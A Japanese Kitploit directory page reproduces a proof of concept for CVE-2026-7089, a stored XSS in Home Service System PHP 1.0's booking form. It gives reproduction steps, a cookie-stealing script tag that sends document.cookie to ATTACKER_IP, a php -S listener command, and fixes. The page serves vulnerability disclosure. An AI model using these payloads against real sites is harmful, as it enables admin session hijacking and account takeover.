Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-7089-XSS — CVE-2026-7089の概念実証。Home Service System PHP 1.0における格納型XSSで、予約フォームを介した未認証の管理者セッションハイジャックを可能にします。 | Kitploit
ツール/GitHubGitHub/xmyronn/cve-2026-7089-xss
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubxmyronn/cve-2026-7089-xss

CVE-2026-7089-XSS

CVE-2026-7089の概念実証。Home Service System PHP 1.0における格納型XSSで、予約フォームを介した未認証の管理者セッションハイジャックを可能にします。

リポジトリを見る
4ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

home-service-system-unauth-stored-xss-admin-takeover

脆弱性の詳細

フィールド詳細
ベンダーcode-projects.org
製品Home Service System In PHP
バージョン1.0
脆弱性タイプ格納型クロスサイトスクリプティング(XSS)
CWECWE-79
認証要件なし
作成者Imad Alvi

説明

Home Service System In PHP 1.0 の booking.php ファイルに、格納型クロスサイトスクリプティング(XSS)の脆弱性が存在します。認証されていないユーザーが、予約フォームのフィールドを通じて悪意のある JavaScript ペイロードを注入できます。サニタイズされていない入力はデータベースに保存され、管理パネル(admin.php)で出力エンコーディングなしにレンダリングされ、管理者のブラウザコンテキストで実行されます。

これにより、認証されていない攻撃者が管理者のセッション Cookie を窃取し、管理者に代わって操作を実行したり、管理者アカウントを完全に乗っ取ったりすることが可能になります。


影響を受けるコンポーネント

  • ファイル: booking.php
  • パラメータ: fname、lname
  • シンク: admin.php → 予約管理

再現手順

  1. 認証されていないユーザーとして予約ページに移動します: http://TARGET/homeservices/booking.php?provider=

    Screenshot 2026-04-08 221145
  2. 名 フィールドに、以下のペイロードを注入します:

root@kitploit:~
<script>new Image().src="http://ATTACKER_IP:PORT?c="+document.cookie</script>
  1. 残りのフィールドに有効なデータを入力し、予約を送信します。

  2. 攻撃者マシンでリスナーを起動します:

root@kitploit:~
php -S 0.0.0.0:PORT
  1. 管理者が admin.php の予約管理セクションを訪問するのを待ちます。

  2. ペイロードが管理者のブラウザで実行され、セッション Cookie がリスナーに流出します。

    Screenshot 2026-04-08 221158
Screenshot 2026-04-08 221214

概念実証

ペイロード(アラート)

root@kitploit:~
<script>alert(1)</script>
Screenshot 2026-04-08 220538

ペイロード(セッションハイジャック)

root@kitploit:~
<script>new Image().src="http://ATTACKER_IP:7979?c="+document.cookie</script>

影響

この脆弱性により、リモートの認証されていない攻撃者がアプリケーションを完全に侵害することが可能になります。

攻撃者は以下のことができます:

  • 管理者のブラウザで任意の JavaScript を実行する
  • 管理者の PHPSESSID セッション Cookie を窃取する
  • 管理者セッションをハイジャックし、完全な管理アクセス権を取得する
  • 任意の管理操作(予約管理、プロバイダー管理など)を実行する

これにより、アプリケーションが完全に侵害されます。

修正方法

  • すべてのユーザー入力に対して、保存またはレンダリング前に htmlspecialchars() を ENT_QUOTES 付きで適用する
  • コンテンツセキュリティポリシー(CSP)ヘッダーを実装する
  • すべてのフォーム入力をサーバーサイドで検証およびサニタイズする

参考情報

  • Home Service System In PHP - code-projects.org
ツールをダウンロード